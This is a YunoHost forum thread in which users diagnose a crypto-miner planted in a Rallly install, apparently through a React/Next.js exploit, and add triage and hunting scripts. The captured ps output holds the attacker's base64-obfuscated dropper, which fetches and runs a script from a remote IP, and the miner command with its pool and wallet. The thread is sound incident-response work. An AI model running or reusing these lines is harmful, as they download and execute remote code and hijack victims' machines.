After Rallly update to version 4.5.6 a miner is on my system. Version 4.5.13 fixed many security issues

What app is this about, and its version: Rallly 4.5.6~ynh1
What YunoHost version are you running: YunoHost 12.1.36
What type of hardware are you using: Old laptop or computer

Describe your issue

Rallly latest version. Now a miner is active, using 50% of the CPU. Maybe the miner was there before the Rallly update. Rallly was the latest update.

Share relevant logs or error messages

This is the output of “sudo ps aux | grep c3” on the machine:

rallly    250514  0.0  0.0   2588   944 ?        S    04:40   0:00 /bin/sh -c echo d2dldCAtTyAvdG1wL3Rlc3Quc2ggaHR0cDovLzMxLjU3LjQ2LjI4L3Rlc3Quc2gmJnNoIC90bXAvdGVzdC5zaA==|base64 -d|sh

rallly    250519  198 29.9 2441116 2403496 ?     SNl  04:40 1515:34 ./hash -o auto.c3pool.org:13333 -u 45vWwParN9pJSmRVEd57jH5my5N7Py6Lsi3GqTg3wm8XReVLEietnSLWUSXayo5LdAW2objP4ubjiWTM7vk4JiYm4j3Aozd -p miner_1765251666 --randomx-1gb-pages --cpu-priority=0 --cpu-max-threads-hint=80

Can you at least share the upgrade log and explain where the line you’re copy-pasting is coming from?

Could it be a React exploit with no direct link to YunoHost or Rallly?

I see that Rallly 4.5.8 has updated to React 19.1.2.


I suppose we can try to dig into where this “hash” thing is coming from and at what time exactly it was created …

We can find out the current working directory of this process (assuming it’s still running, using its PID 250519):

readlink -e /proc/250519/cwd

and then you can run ls -l followed by the corresponding directory, which should give an idea of the content and the creation/modification dates, in particular of the program called “hash”.

Also, let’s try to have a better look at what exactly is running this “hash” program, using something like ps -ef --forest | grep -C10 hash | grep rally
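The triage steps above, gathered into one script, as an added example that is not part of the original post nor of YunoHost or Rallly. It assumes Linux with /proc and GNU coreutils (readlink, base64, stat, sort); the function names are mine. The only input embedded in it is the command line already quoted in the first post, so the base64 decoding runs offline, while the live /proc lookups need a PID argument.

```shell
#!/bin/sh
# Added example (not from the thread, YunoHost or Rallly): triage helpers for
# a suspicious process. Assumes Linux with /proc and GNU coreutils; the
# function names are my own.

# Where does the process live? cwd, executable, parent and full command line.
# /proc/<pid>/exe still resolves if the binary was deleted after start (the
# link then ends in " (deleted)"), which is itself a useful signal.
proc_info() {
    pid="$1"
    [ -d "/proc/$pid" ] || { echo "no such process: $pid" >&2; return 1; }
    echo "pid=$pid"
    echo "ppid=$(awk '/^PPid:/ {print $2}' "/proc/$pid/status")"
    echo "cwd=$(readlink "/proc/$pid/cwd")"
    echo "exe=$(readlink "/proc/$pid/exe")"
    printf 'cmdline='; tr '\0' ' ' < "/proc/$pid/cmdline"; echo
}

# Droppers hide their real command as "echo <base64> | base64 -d | sh".
# Pull the first long base64 token out of a command line and decode it.
decode_b64_cmd() {
    printf '%s\n' "$1" | grep -oE '[A-Za-z0-9+/]{16,}={0,2}' | head -n 1 | base64 -d
}

# List a directory newest-first with mtime, owner and size, so a freshly
# dropped archive (kal.tar.gz in the thread) sorts to the top and a
# timestamp-preserving extraction (the "Nov 2023" hash binary) to the bottom.
list_with_times() {
    for f in "$1"/* "$1"/.[!.]*; do
        [ -e "$f" ] || continue
        stat -c '%y  %U  %10s  %n' "$f"
    done | sort -r
}

# The command line captured in the thread's ps output (constructed input for
# this example); the dropper's intent becomes readable once decoded.
SAMPLE_CMDLINE='/bin/sh -c echo d2dldCAtTyAvdG1wL3Rlc3Quc2ggaHR0cDovLzMxLjU3LjQ2LjI4L3Rlc3Quc2gmJnNoIC90bXAvdGVzdC5zaA==|base64 -d|sh'
echo "dropper decodes to: $(decode_b64_cmd "$SAMPLE_CMDLINE")"

# Live triage of a running process:  sh triage.sh <pid>
if [ -n "${1:-}" ]; then
    proc_info "$1" && list_with_times "$(readlink "/proc/$1/cwd")"
fi
```

Run it as root with the miner's PID while the process is still alive; once it has been killed, /proc no longer has anything to show and only the decoded dropper command remains as evidence.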

sudo readlink -e /proc/250519/cwd
/var/www/rallly/apps/web/.next/standalone/apps/web

sudo ls -l /var/www/rallly/apps/web/.next/standalone/apps/web
total 10352
-rwxr-xr-x 1 rallly rallly 7047392 23 Nov 2023 hash
-rw-r--r-- 1 rallly rallly 3522081 9 Dec 01:46 kal.tar.gz
drwxr-xr-x 4 rallly rallly 4096 30 Nov 15:17 node_modules
-rw-r----- 1 rallly rallly 4284 30 Nov 15:17 package.json
drwxr-xr-x 3 rallly rallly 4096 30 Nov 15:17 public
-rw-r--r-- 1 rallly rallly 7220 30 Nov 15:17 server.js
drwxr-xr-x 2 rallly rallly 4096 23 Jun 02:46 xmrig-6.24.0

Update of Rallly, according to the YunoHost logs:
Start: 30 November 2025 at 15:11:05
End: 30 November 2025 at 15:17:26

sudo ps -ef --forest | grep -C10 hash | grep rally
normal-user    358230  357481  0 19:25 pts/0    00:00:00              \_ grep rally

Not sure how you ended up finding this btw, but this bit is “obfuscated” base64 that downloads a script from a Chinese server and runs it … thankfully that’s “only” as the rallly user and not as root …

If you want we can dig further: since the code is supposedly downloaded into /tmp/test.sh, we can cat /tmp/test.sh to display the content and learn a bit about what it does, though I would assume that’s what set up the crypto miner.

Anyway, back to the “hash” program in /var/www/rallly: we see that the modification date is Nov 2023, but considering that the upgrade completely replaces the /var/www/rallly folder, I would assume that it was put there after the upgrade itself (or maybe there’s a cron job or something somewhere that re-sets up the cryptominer).

Also, considering it ended up in the .next folder, it points to being related to the React / Next.js exploit mentioned by @clacos earlier.

A quick Google search for kal.tar.gz (which is listed in the ls -l) seems to confirm it. For example in this discussion: https://old.reddit.com/r/nextjs/comments/1pe2ep4/the_vulnerability_is_not_a_joke_you_should/nsnn03c/

Not sure how to properly deal with this exactly. I would say at least uninstall rallly (which should also delete the user, which the virus supposedly only has access to), and then we should do some extensive checks for anything suspicious.

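The “extensive check” suggested above, as an added example script that is not from the thread, YunoHost or Rallly. It assumes Linux with GNU find, procps and iproute2, an app user and directory matching the defaults below, and uses the upgrade window from the YunoHost log as the reference timestamps; the function names and defaults are my assumptions, and the kill helper is deliberately not run automatically.

```shell
#!/bin/sh
# Added example (not from the thread, YunoHost or Rallly): a post-compromise
# hunt for the unprivileged app user. Assumes Linux with GNU find/coreutils,
# procps (ps, pgrep, pkill) and iproute2 (ss). Names and defaults are my own.

APP_USER="${APP_USER:-rallly}"
APP_DIR="${APP_DIR:-/var/www/rallly}"
UPGRADE_START="${UPGRADE_START:-2025-11-30 15:11:05}"
UPGRADE_END="${UPGRADE_END:-2025-11-30 15:17:26}"

# The upgrade rewrites the app directory, so a legitimate file's mtime falls
# inside the upgrade window. Anything newer was written afterwards (the
# kal.tar.gz of 9 Dec); anything older was extracted with preserved
# timestamps (the hash binary dated Nov 2023). Both deserve a look.
# Usage: files_outside_window <dir> <window-start> <window-end>
files_outside_window() {
    find "$1" -xdev -type f \( -newermt "$3" -o ! -newermt "$2" \) 2>/dev/null | sort
}

# Persistence an unprivileged user can set up without root, plus what the
# user is running and talking to right now.
persistence_check() {
    user="$1"
    home="$(getent passwd "$user" | cut -d: -f6)"
    echo "== crontab for $user";    crontab -l -u "$user" 2>/dev/null || echo "(none)"
    echo "== systemd user units";    ls -la "$home/.config/systemd/user" 2>/dev/null || echo "(none)"
    echo "== shell startup files";   ls -la "$home"/.bashrc "$home"/.profile "$home"/.bash_profile 2>/dev/null || echo "(none)"
    echo "== authorized ssh keys";   cat "$home/.ssh/authorized_keys" 2>/dev/null || echo "(none)"
    echo "== processes of $user";    ps -u "$user" -o pid,ppid,lstart,args 2>/dev/null
    echo "== network connections"
    for p in $(pgrep -u "$user"); do ss -tnp 2>/dev/null | grep -F "pid=$p,"; done
}

# Killing a single PID let the miner respawn ten xmrig workers in the thread.
# Freeze every process of the user first (nothing can respawn while stopped),
# then kill the whole set. Run as root, and only after collecting evidence.
stop_all_for_user() {
    pkill -STOP -u "$1" && pkill -KILL -u "$1"
}

# Read-only run when executed as root on a box that has the app user.
if [ "$(id -u)" = 0 ] && id "$APP_USER" >/dev/null 2>&1; then
    echo "== files outside the upgrade window under $APP_DIR"
    files_outside_window "$APP_DIR" "$UPGRADE_START" "$UPGRADE_END"
    persistence_check "$APP_USER"
fi
```

The window check is the one that would have flagged both artefacts from the listing above: kal.tar.gz for being newer than the upgrade and hash for being older than it. Uninstalling the app removes the user and its files, but a cron entry, a user systemd unit or an extra SSH key belonging to another account would survive that, which is why the persistence checks are listed separately.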

It would also be interesting to know how you found out about the issue in the first place. Was it because of high CPU usage slowing down the rest of the system? Like you did a top / htop and ended up seeing this program?


Yes, I found it because the App “NetData” showed a high CPU usage on the server of constant 50% (2 of 4 cores), which I confirmed with htop and top. There I saw the miner application.


The cat /tmp/test.sh shows a “file not found” error.

1.) I killed the hash process with kill -9 250519 and immediately saw maybe 10 new processes with the name xmrig-6.24.0.
2.) I upgraded Rallly from version 4.5.6 to version 4.5.8, which is available now.
3.) The listing of the “web” folder is now missing the xmrig-6.24.0 binary.

sudo ls -l /var/www/rallly/apps/web/.next/standalone/apps/web
total 24
drwxr-xr-x   4 rallly rallly 4096  9 Dec 22:55 node_modules
-rw-r-----   1 rallly rallly 4438  9 Dec 22:55 package.json
drwxr-xr-x   3 rallly rallly 4096  9 Dec 22:55 public
-rw-r--r--   1 rallly rallly 7271  9 Dec 22:56 server.js

4.) now the CPU usage is back to normal. Hopefully that problem is solved.


Version 4.5.13 fixes additional security issues in React (released 21.12.2025).

